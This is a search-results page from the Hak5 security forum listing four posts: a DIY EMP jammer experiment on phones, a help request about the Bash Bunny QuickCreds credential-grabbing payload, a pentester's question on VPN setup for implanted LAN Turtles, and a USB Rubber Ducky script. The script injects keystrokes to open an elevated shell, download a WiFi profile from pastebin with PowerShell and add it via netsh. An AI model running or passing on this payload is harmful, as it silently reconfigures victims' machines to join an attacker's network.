Jump to content

Search the Community

Showing results for tags 'quick'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 4 results

  1. Hi everyone, I'm currently working on a project involving a DIY Portable EMP Jammer. I tested the device on a Samsung S7 (with LineageOS, distance 0.3-0.5 mm). It didn't have the effects I wished for, but some other effects that I think is interesting. I documented recorded the test with my phone. Effects on test device: 1. Open random applications. 2. Random zero touch button press. 3. Cant no longer connect to wi-fi. LoL Effects on unintended device (Android 9, distance approx 100 cm): 1. Camera flickers a little. 2. The phone sends an huge amount of QUIC-packages. 3. Gets blacklisted by my DOS-protection on my router. So my conclusion is: It seems possible to simulate a UDP overflow attack with electromagnetic fields on devices using QUIC protocol. The issue: I have a hard time figure out in which ways and if it's possible to utilize on that reaction. Anyways do anyone have any input on this, or think it sounds interesting? Best regard Paraply
  2. Hello everyone! I was having some trouble running the QuickCreds payload with my Bash Bunny. I have tested other payloads that work (such as the nmapper and a basic ducky hello world that I wrote). I have installed the tools into the /pentest folder properly. It seems to get stuck in an infinite loop where it's blinking amber (I believe). When I unplug it, switch to arming mode, and open up the files I see a loot folder that wasn't there before. It then goes to quickcreds --> name_of_computer but there's nothing inside that folder. I've let it go for as high as about thirty minutes before giving up on it. I'm not sure what I'm doing wrong. I've tested it on a MacBook Pro, a linux laptop, and a Windows 7 64 bit Virtual Machine, all with the same problem. I saw other people post about it with the same issue as me but I didn't see a response that worked. Thanks in advance for your help!
  3. Hey folks, So I'm on an active gig and I have two turtles deployed at a client. I burned all of yesterday trying to follow a bunch of walkthroughs of how to get openvpn setup (I think I have the server mostly setup), so rather than burning any more days of this gig trying to get the client part on the turtle working, I was hoping to basically copypaste some sort of simple config from someone who already has it setup. If anybody has a quick, bullet-point list of the steps required that would be super useful. I fathom that in the future (the very near future) these steps could be rolled into a deployment shell script that would permit someone in a pentest/redteam role to rapidly deploy a brand new server on an ec2/digitalocean VM and quickly reconfigure the turtle - this is especially helpful if you end up playing cat-and-mouse with the blueteam and they find/block your hosts in a short turn around. Any help would be appreciated!
  4. Hi guys, I was browsing through a couple of the old payloads on the USB Rubber Ducky wiki and saw that one had been written to associate with the wifi pineapple. The method that was used went through the GUI and took too long. I decided that it must be possible to accomplish using netsh. I threw this script together (originally for my Teensy++, but I rewrote it for the ducky). It uses Mubix' powershell code to download an xml file from pastebin (that I uploaded) and then adds it to the wireless profile using netsh. The whole process takes roughly 6-7 seconds on my Teensy, would be great to hear how you guys get on with it on the ducky! Here is the code: REM Brought to you by Xcellerator DEFAULT_DELAY 200 DELAY 3000 GUI r STRING cmd MENU STRING a ENTER LEFT ENTER STRING cd %TEMP% ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml') ENTER DELAY 1000 ENTER STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection" ENTER STRING del a.xml ENTER STRING exit ENTER [/CODE] You can also find it on the wiki https://github.com/h...ion-(VERY-FAST). The Teensy Version can be found here: http://pastebin.com/c9KSdNAe
×
×
  • Create New...